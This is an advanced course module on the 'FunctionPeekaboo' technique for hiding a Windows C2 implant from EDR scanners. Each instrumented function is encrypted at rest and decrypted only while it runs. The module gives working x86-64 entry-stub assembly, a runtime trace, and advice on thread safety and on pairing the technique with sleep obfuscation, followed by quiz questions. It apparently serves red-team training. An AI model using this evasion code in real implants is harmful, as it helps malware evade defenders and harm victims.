Difficulty: Advanced

Module 7: Initialization & Runtime Flow

From binary load to encrypted-at-rest — tracing the complete execution flow from startup through function calls.

Module Objective

Trace the complete runtime lifecycle of a FunctionPeekaboo-instrumented binary: the .stub entry point hijack, initial encryption of all registered functions, the transition to normal program execution, and the steady-state flow of decrypt-on-call and re-encrypt-on-return during operation.

1. The Boot Sequence

When the Windows loader executes the binary, the normal startup sequence is hijacked by FunctionPeekaboo. Here is the complete sequence from process creation to steady-state operation:

Boot Sequence

OS Loader
Maps PE sections
Resolves imports
.stub Init
Encrypt all funcs
Setup TEB
Original EP
CRT startup
mainCRTStartup()
main()
Application code
Self-masking active
StepWhat HappensState of Registered Functions
1. PE LoadingWindows maps the executable into memory, resolves imports, processes relocationsCleartext (as compiled)
2. Entry PointWindows calls AddressOfEntryPoint, which points to .stub (set by modifyEP.py)Cleartext
3. .stub InitThe stub walks .funcmeta and XOR-encrypts every registered function bodyTransitioning to encrypted
4. TEB SetupThe stub initializes TEB UserReserved fields to zero (no active function)All encrypted
5. Jump to Original EPThe stub jumps to the original entry point (saved during post-processing)All encrypted
6. CRT InitializationmainCRTStartup runs: initializes heap, stdio, runs static constructorsAll encrypted (CRT functions are not registered)
7. main() EntryApplication code begins executingAll encrypted (self-masking active)

2. The .stub Initialization Code

The .stub section contains the initialization routine. Its job is to encrypt all registered functions before any application code runs:

x86-64 Assemblysection .stub
_peekaboo_init:
    ; === Prologue: save all registers ===
    pushfq
    push    rax
    push    rbx
    push    rcx
    push    rdx
    push    rsi
    push    rdi
    push    r8
    push    r9
    push    r10
    push    r11

    ; === Initialize TEB UserReserved fields ===
    xor     eax, eax
    mov     qword ptr gs:[0x1478], rax    ; UserReserved[0] = NULL
    mov     qword ptr gs:[0x1480], rax    ; UserReserved[1] = 0
    mov     qword ptr gs:[0x1488], rax    ; UserReserved[2] = 0

    ; === Find image base ===
    call    .Lgetip
.Lgetip:
    pop     rbx                            ; RBX = our address
    and     rbx, 0xFFFFFFFFFFFF0000        ; Align to 64KB
.Lscan:
    cmp     word ptr [rbx], 0x5A4D         ; "MZ"?
    je      .Lfound
    sub     rbx, 0x10000
    jmp     .Lscan
.Lfound:
    ; RBX = ImageBase

    ; === Find .funcmeta section ===
    mov     ecx, [rbx + 0x3C]             ; e_lfanew
    lea     rdx, [rbx + rcx]              ; PE header
    movzx   ecx, word ptr [rdx + 6]       ; NumberOfSections
    movzx   r8d, word ptr [rdx + 20]      ; SizeOfOptionalHeader
    lea     rsi, [rdx + 24 + r8]          ; First section header

.Lsec_loop:
    cmp     dword ptr [rsi], 0x6E75662E   ; ".fun"
    jne     .Lsec_next
    cmp     dword ptr [rsi+4], 0x74656D63 ; "cmet"
    je      .Lsec_found
.Lsec_next:
    add     rsi, 40
    dec     ecx
    jnz     .Lsec_loop
    jmp     .Ldone                         ; .funcmeta not found, skip

.Lsec_found:
    mov     ecx, [rsi + 12]               ; .funcmeta VirtualAddress
    lea     rsi, [rbx + rcx]              ; RSI = .funcmeta data

    ; === Iterate entries and encrypt each function ===
.Lentry_loop:
    mov     edi, [rsi]                     ; FunctionRVA
    test    edi, edi
    jz      .Ldone                         ; NULL terminator = end

    mov     ecx, [rsi + 4]                ; FunctionSize
    movzx   eax, byte ptr [rsi + 8]       ; XorKey

    ; Calculate function VA
    lea     rdi, [rbx + rdi]              ; RDI = function body address

    ; VirtualProtect to RW
    sub     rsp, 40                        ; Shadow space + oldProtect
    lea     r9, [rsp + 32]                ; &oldProtect
    mov     r8d, 0x04                     ; PAGE_READWRITE
    mov     edx, ecx                      ; Size
    mov     rcx, rdi                      ; Address
    call    [VirtualProtect_IAT]
    add     rsp, 40

    ; XOR encrypt the function body
    mov     ecx, [rsi + 4]                ; Reload size
    movzx   eax, byte ptr [rsi + 8]       ; Reload key
.Lxor:
    xor     byte ptr [rdi], al
    inc     rdi
    dec     ecx
    jnz     .Lxor

    ; Reload function address for VirtualProtect restore
    mov     edi, [rsi]
    lea     rdi, [rbx + rdi]

    ; VirtualProtect back to RX
    sub     rsp, 40
    lea     r9, [rsp + 32]
    mov     r8d, 0x20                     ; PAGE_EXECUTE_READ
    mov     edx, [rsi + 4]
    mov     rcx, rdi
    call    [VirtualProtect_IAT]
    add     rsp, 40

    ; Mark as encrypted
    mov     byte ptr [rsi + 9], 1

    ; Next entry
    add     rsi, 12
    jmp     .Lentry_loop

.Ldone:
    ; === Restore all registers ===
    pop     r11
    pop     r10
    pop     r9
    pop     r8
    pop     rdi
    pop     rsi
    pop     rdx
    pop     rcx
    pop     rbx
    pop     rax
    popfq

    ; === Jump to original entry point ===
    jmp     ORIGINAL_ENTRY_POINT          ; Patched by modifyEP.py

Timing Window

Between PE loading (step 1) and .stub initialization (step 3), the functions are briefly in cleartext. This window is extremely short (microseconds), occurring before any user-mode code in the process runs. An EDR would need a very aggressive injection-time scan to catch this window. Once initialization completes, functions remain encrypted until explicitly called.

3. Steady-State Runtime Flow

After initialization, the self-masking system operates transparently during normal program execution. Here is a detailed trace of what happens when a peekaboo function is called:

TextCaller code: call beacon_checkin

Time 0:    beacon_checkin body is ENCRYPTED (XOR'd garbage bytes)

Time 1:    Prologue stub executes:
           - CALL/POP gets current address
           - Pushes all registers + flags
           - Calls handler(func_ptr, DECRYPT)

Time 2:    Handler executes:
           - Finds PE image base
           - Parses .funcmeta, finds beacon_checkin entry
           - VirtualProtect(body, size, PAGE_READWRITE)
           - XOR decrypts body bytes
           - VirtualProtect(body, size, PAGE_EXECUTE_READ)
           - Sets IsEncrypted = 0
           - Stores func_ptr in TEB UserReserved[0]

Time 3:    Prologue stub continues:
           - Pops all registers + flags
           - Falls through to now-decrypted function body

Time 4:    beacon_checkin body executes NORMALLY
           (all original instructions run as compiled)

Time 5:    beacon_checkin reaches a RET instruction
           Epilogue stub executes:
           - Pushes all registers + flags
           - Calls handler(func_ptr, ENCRYPT)

Time 6:    Handler executes:
           - VirtualProtect(body, size, PAGE_READWRITE)
           - XOR encrypts body bytes
           - VirtualProtect(body, size, PAGE_EXECUTE_READ)
           - Sets IsEncrypted = 1
           - Clears TEB UserReserved[0]

Time 7:    Epilogue stub continues:
           - Pops all registers + flags
           - Executes RET (returns to caller)

Time 8:    beacon_checkin body is ENCRYPTED again

4. Function Call Chains

Real programs involve deep call chains. Here is how FunctionPeekaboo handles nested calls between instrumented functions:

Nested Call Example

Textmain() calls func_A() calls func_B() calls func_C()
(only func_A and func_C are peekaboo-registered)

Step 1: main calls func_A
  - func_A prologue: DECRYPT func_A
  - State: func_A=clear, func_B=N/A, func_C=encrypted

Step 2: func_A calls func_B (NOT registered)
  - No prologue/epilogue stubs
  - func_B runs normally
  - State: func_A=clear, func_C=encrypted

Step 3: func_B calls func_C
  - func_C prologue: DECRYPT func_C
  - State: func_A=clear, func_C=clear (2 decrypted)

Step 4: func_C returns to func_B
  - func_C epilogue: ENCRYPT func_C
  - State: func_A=clear, func_C=encrypted

Step 5: func_B returns to func_A
  - No epilogue (func_B not registered)
  - State: func_A=clear, func_C=encrypted

Step 6: func_A returns to main
  - func_A epilogue: ENCRYPT func_A
  - State: all encrypted

5. Thread Safety

In a multithreaded implant, different threads may call different peekaboo functions simultaneously. The handler must be thread-safe:

ConcernHow FunctionPeekaboo Handles It
TEB statePer-thread (each thread has its own TEB via GS), no shared state for tracking
.funcmeta writesThe IsEncrypted flag is a single byte, and byte writes are atomic on x86. However, two threads calling the same function simultaneously is a race condition
Same function, two threadsIf thread A decrypts func_X and thread B also needs func_X, thread B sees it already decrypted (IsEncrypted=0) and skips decryption. But if thread A re-encrypts while B is still executing, corruption occurs
VirtualProtectAffects the entire process (memory permissions are per-page, not per-thread). Changes by one thread are visible to all

The Thread Race Problem

The most critical thread safety issue: if two threads call the same peekaboo function, thread A might re-encrypt it (on return) while thread B is still executing it. The simplest mitigation is a reference counter per function in .funcmeta — only re-encrypt when the counter reaches zero. The PoC may not fully address this; production implementations like Nighthawk use more sophisticated synchronization.

6. Exception Handling Considerations

If a peekaboo function throws an exception (C++ exception, SEH, or hardware exception), the normal return path is bypassed. The epilogue stub never runs, leaving the function decrypted:

Exception Scenarios

Exception TypeImpactMitigation
C++ throwStack unwinding skips the epilogue stubRegister an SEH handler in the prologue that re-encrypts on unwind
SEH exceptionIf caught by a handler in a parent frame, epilogue is skippedUse __finally blocks or custom unwind handlers
Access violationProcess may terminate; re-encryption irrelevantNone needed (process is dying)
VEH handlerVectored exception handler might resume execution; function stays decryptedVEH handler should check TEB state and re-encrypt if needed

The PoC FunctionPeekaboo focuses on the happy path. A production implementation would register unwind handlers to ensure re-encryption even on exceptional control flow paths.

7. Integration with Sleep Obfuscation

FunctionPeekaboo and sleep obfuscation can be combined for maximum coverage:

TextCombined Protection Timeline:

Active Phase (checking in, executing commands):
  FunctionPeekaboo: ~98% of code encrypted (only active function decrypted)
  Sleep obfuscation: not active (implant is awake)
  Net coverage: ~98%

Sleep Phase (waiting between check-ins):
  FunctionPeekaboo: 100% encrypted (no function executing)
  Sleep obfuscation: 100% encrypted (entire image masked)
  Net coverage: 100% (double encrypted)

Result: At no point is more than ~2% of code in cleartext

Layered Defense

Using both techniques together means the implant has strong protection in both active and passive states. Sleep obfuscation handles the sleep window, and FunctionPeekaboo handles the active window. The ~2% gap during active execution represents only the single function currently running — a very small signature surface for any scanner to catch.

8. Debugging FunctionPeekaboo Binaries

Debugging is more complex because function bodies are encrypted at rest. When you set a breakpoint in a debugger, the breakpoint address might contain encrypted garbage:

Debugging Tips

9. Performance Profiling

OperationTypical LatencyNotes
Prologue stub (register save)~10nsPush instructions, fast
Handler: PE parsing~50nsMemory reads, cached after first call
Handler: .funcmeta lookup~20nsLinear scan, typically <20 entries
Handler: VirtualProtect (RX→RW)~1-5μsSystem call, dominates total time
Handler: XOR loop (1KB function)~100nsFast, memory-bound
Handler: VirtualProtect (RW→RX)~1-5μsSecond system call
Epilogue stub (register restore)~10nsPop instructions, fast
Total per call+return~4-20μsDominated by VirtualProtect syscalls

For a C2 beacon that checks in every 60 seconds, a 20μs overhead per function call is completely negligible. Even with dozens of peekaboo functions called per check-in cycle, the total overhead is under 1ms — invisible to the user and the C2 framework.

Knowledge Check

Q1: When are all registered functions first encrypted?

A) At compile time by the LLVM backend
B) At runtime by the .stub initialization code, before the CRT runs
C) When the first function is called
D) During the modifyEP.py post-processing step

Q2: What is the main thread safety risk with FunctionPeekaboo?

A) TEB fields are shared between threads
B) VirtualProtect only works on the main thread
C) Two threads calling the same function can race: one re-encrypts while the other is still executing
D) The XOR engine is not thread-safe

Q3: What dominates the per-function-call performance overhead?

A) VirtualProtect system calls (~1-5μs each, two per operation)
B) The XOR encryption loop
C) PE header parsing
D) Register save/restore in the stubs